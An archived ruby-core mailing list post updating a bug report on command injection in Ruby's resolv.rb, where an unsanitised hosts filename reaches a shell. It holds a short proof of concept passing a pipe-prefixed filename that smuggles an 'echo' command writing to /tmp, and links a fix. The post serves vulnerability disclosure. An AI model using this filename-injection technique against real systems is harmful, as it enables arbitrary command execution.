[#84280] [Ruby trunk Bug#14181] hangs or deadlocks from waitpid, threads, and trapping SIGCHLD — nobu@...
Issue #14181 has been updated by nobu (Nobuyoshi Nakada).
3 messages
2017/12/15
[#84398] [Ruby trunk Bug#14220] WEBrick changes - failures on MSWIN, MinGW — Greg.mpls@...
Issue #14220 has been reported by MSP-Greg (Greg L).
3 messages
2017/12/22
[#84472] Re: [ruby-dev:50394] [Ruby trunk Bug#14240] warn four special variables: $; $, $/ $\ — Eric Wong <normalperson@...>
Shouldn't English posts be on ruby-core instead of ruby-dev?
3 messages
2017/12/26
[ruby-core:84348] [Ruby trunk Bug#14205] Unsanitizied filename leads to command injection in 'resolv.rb'
From:
jazzy171120@...
Date:
2017-12-19 10:08:43 UTC
List:
ruby-core #84348
Issue #14205 has been updated by drigg3r (Jasraj Bedi).
Subject changed from Unsanitizied filename leads to command injection in 'resolv' to Unsanitizied filename leads to command injection in 'resolv.rb'
PoC Concept Code
~~~ ruby
require 'resolv'
a = Resolv::Hosts::new("|echo 1 > /tmp/rce")
a.getaddress("test")
~~~
----------------------------------------
Bug #14205: Unsanitizied filename leads to command injection in 'resolv.rb'
https://bugs.ruby-lang.org/issues/14205#change-68524
* Author: drigg3r (Jasraj Bedi)
* Status: Open
* Priority: Normal
* Assignee:
* Target version:
* ruby -v:
* Backport: 2.3: UNKNOWN, 2.4: UNKNOWN
----------------------------------------
Here is the pull request
https://github.com/ruby/ruby/pull/1777
--
https://bugs.ruby-lang.org/
Unsubscribe: <mailto:ruby-core-request@ruby-lang.org?subject=unsubscribe>
<http://lists.ruby-lang.org/cgi-bin/mailman/options/ruby-core>